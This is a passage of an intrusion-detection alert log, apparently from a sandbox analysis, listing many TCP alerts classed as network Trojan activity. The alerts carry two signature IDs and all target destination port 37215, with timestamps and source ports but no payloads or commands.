                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281292
                SID:2829579
                Source Port:60814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667423
                SID:2829579
                Source Port:45264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563568
                SID:2829579
                Source Port:38352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963210
                SID:2835222
                Source Port:34076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668062
                SID:2829579
                Source Port:39962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659773
                SID:2829579
                Source Port:39706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522367
                SID:2829579
                Source Port:55014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906838
                SID:2829579
                Source Port:46832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212141
                SID:2835222
                Source Port:37374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766227
                SID:2829579
                Source Port:42212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987137
                SID:2835222
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.671051
                SID:2835222
                Source Port:34232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890903
                SID:2829579
                Source Port:48068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378883
                SID:2829579
                Source Port:46034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782160
                SID:2835222
                Source Port:44396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843823
                SID:2835222
                Source Port:33924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906412
                SID:2835222
                Source Port:47312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653498
                SID:2829579
                Source Port:55212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640779
                SID:2829579
                Source Port:53996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787077
                SID:2829579
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266992
                SID:2835222
                Source Port:42920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915298
                SID:2829579
                Source Port:38914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765116
                SID:2829579
                Source Port:55952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835816
                SID:2835222
                Source Port:40062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737242
                SID:2829579
                Source Port:37068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080854
                SID:2829579
                Source Port:58020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735419
                SID:2835222
                Source Port:57536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141909
                SID:2829579
                Source Port:52238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644985
                SID:2835222
                Source Port:51482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088470
                SID:2829579
                Source Port:58048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075748
                SID:2829579
                Source Port:33250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640632
                SID:2829579
                Source Port:48332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466073
                SID:2835222
                Source Port:40694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324665
                SID:2835222
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810508
                SID:2829579
                Source Port:57102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557990
                SID:2829579
                Source Port:57930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263841
                SID:2835222
                Source Port:36968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681698
                SID:2835222
                Source Port:36170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652509
                SID:2829579
                Source Port:57496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266726
                SID:2835222
                Source Port:40950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088087
                SID:2835222
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981167
                SID:2829579
                Source Port:52378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223096
                SID:2829579
                Source Port:43336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808507
                SID:2835222
                Source Port:41384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574715
                SID:2829579
                Source Port:57794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742622
                SID:2835222
                Source Port:41016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.104901
                SID:2835222
                Source Port:33732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667488
                SID:2835222
                Source Port:55520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910806
                SID:2835222
                Source Port:41496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515129
                SID:2829579
                Source Port:36776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737183
                SID:2829579
                Source Port:40526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339225
                SID:2835222
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843876
                SID:2835222
                Source Port:47716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.241917
                SID:2829579
                Source Port:52594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560873
                SID:2829579
                Source Port:33534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683786
                SID:2835222
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420941
                SID:2829579
                Source Port:38612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956062
                SID:2835222
                Source Port:40796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321665
                SID:2835222
                Source Port:35684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507243
                SID:2829579
                Source Port:57600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911773
                SID:2829579
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914937
                SID:2835222
                Source Port:33754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873541
                SID:2835222
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686274
                SID:2829579
                Source Port:51292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587108
                SID:2829579
                Source Port:52494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468699
                SID:2835222
                Source Port:54598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815650
                SID:2829579
                Source Port:49288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655622
                SID:2829579
                Source Port:39422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024678
                SID:2829579
                Source Port:40160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562062
                SID:2829579
                Source Port:38756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080968
                SID:2835222
                Source Port:47908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665347
                SID:2835222
                Source Port:51262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.040006
                SID:2835222
                Source Port:34154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620328
                SID:2835222
                Source Port:35484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.741744
                SID:2829579
                Source Port:59382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902422
                SID:2835222
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235383
                SID:2835222
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421427
                SID:2835222
                Source Port:33430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210792
                SID:2829579
                Source Port:45286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224458
                SID:2835222
                Source Port:44208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180648
                SID:2829579
                Source Port:37974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.399913
                SID:2829579
                Source Port:53190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520365
                SID:2835222
                Source Port:37926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722009
                SID:2835222
                Source Port:43650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988949
                SID:2835222
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464694
                SID:2829579
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613938
                SID:2829579
                Source Port:48936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154175
                SID:2835222
                Source Port:43288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019125
                SID:2829579
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873072
                SID:2835222
                Source Port:59364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943116
                SID:2835222
                Source Port:54512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985731
                SID:2829579
                Source Port:52350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422476
                SID:2829579
                Source Port:46030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500897
                SID:2829579
                Source Port:59094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501362
                SID:2829579
                Source Port:46108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976301
                SID:2835222
                Source Port:56728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535641
                SID:2835222
                Source Port:58058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617643
                SID:2835222
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575130
                SID:2835222
                Source Port:49040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184770
                SID:2835222
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335499
                SID:2829579
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422005
                SID:2829579
                Source Port:46872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474715
                SID:2835222
                Source Port:59378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225657
                SID:2829579
                Source Port:36212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571143
                SID:2835222
                Source Port:57726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675458
                SID:2835222
                Source Port:40362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712009
                SID:2835222
                Source Port:36464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800372
                SID:2835222
                Source Port:34312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511103
                SID:2835222
                Source Port:36196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993146
                SID:2835222
                Source Port:49796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335428
                SID:2829579
                Source Port:59694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951043
                SID:2829579
                Source Port:58366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916380
                SID:2835222
                Source Port:34460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432726
                SID:2835222
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.961111
                SID:2829579
                Source Port:43560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942904
                SID:2835222
                Source Port:54052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436375
                SID:2829579
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176932
                SID:2835222
                Source Port:53144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886349
                SID:2829579
                Source Port:41842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983915
                SID:2829579
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166950
                SID:2829579
                Source Port:50174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618694
                SID:2829579
                Source Port:53612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960326
                SID:2835222
                Source Port:52084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816891
                SID:2829579
                Source Port:47730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414234
                SID:2829579
                Source Port:46820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980122
                SID:2835222
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982610
                SID:2835222
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461461
                SID:2835222
                Source Port:57530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861983
                SID:2829579
                Source Port:39368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724581
                SID:2829579
                Source Port:41772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.734482
                SID:2829579
                Source Port:57438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284085
                SID:2829579
                Source Port:39604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166632
                SID:2829579
                Source Port:34270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863464
                SID:2835222
                Source Port:44594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363378
                SID:2835222
                Source Port:53336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624978
                SID:2829579
                Source Port:55176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522530
                SID:2835222
                Source Port:46526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141381
                SID:2835222
                Source Port:48354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519838
                SID:2835222
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739627
                SID:2829579
                Source Port:49420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706028
                SID:2829579
                Source Port:34688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175734
                SID:2829579
                Source Port:58118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.232580
                SID:2835222
                Source Port:35134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517395
                SID:2829579
                Source Port:54652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264016
                SID:2835222
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814311
                SID:2835222
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968778
                SID:2829579
                Source Port:38628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845441
                SID:2835222
                Source Port:39380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567117
                SID:2835222
                Source Port:49424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955869
                SID:2835222
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897176
                SID:2829579
                Source Port:58900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.476512
                SID:2835222
                Source Port:48666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890977
                SID:2835222
                Source Port:45212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801447
                SID:2835222
                Source Port:53674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782967
                SID:2835222
                Source Port:39338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613017
                SID:2829579
                Source Port:47346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624831
                SID:2829579
                Source Port:32932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917168
                SID:2835222
                Source Port:55604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900402
                SID:2829579
                Source Port:40502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557068
                SID:2829579
                Source Port:33214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.658379
                SID:2829579
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778040
                SID:2835222
                Source Port:39026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657092
                SID:2835222
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279231
                SID:2829579
                Source Port:36716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286965
                SID:2835222
                Source Port:48142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440031
                SID:2829579
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318033
                SID:2835222
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.734513
                SID:2835222
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798406
                SID:2829579
                Source Port:41166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856235
                SID:2829579
                Source Port:41576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074019
                SID:2829579
                Source Port:45266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272391
                SID:2829579
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417185
                SID:2835222
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900504
                SID:2829579
                Source Port:40476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419253
                SID:2829579
                Source Port:53500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763757
                SID:2835222
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782309
                SID:2835222
                Source Port:54900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820335
                SID:2829579
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968479
                SID:2835222
                Source Port:40830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047713
                SID:2835222
                Source Port:44380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519813
                SID:2835222
                Source Port:53846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870140
                SID:2835222
                Source Port:45218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521734
                SID:2829579
                Source Port:51052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843917
                SID:2835222
                Source Port:33488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365797
                SID:2829579
                Source Port:42694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947632
                SID:2835222
                Source Port:55598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008365
                SID:2835222
                Source Port:39614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559020
                SID:2835222
                Source Port:43322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879237
                SID:2829579
                Source Port:49040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941800
                SID:2835222
                Source Port:55310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984733
                SID:2829579
                Source Port:45854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617669
                SID:2829579
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445664
                SID:2835222
                Source Port:51630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675224
                SID:2829579
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473630
                SID:2829579
                Source Port:54590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607747
                SID:2829579
                Source Port:50654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997256
                SID:2835222
                Source Port:45838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
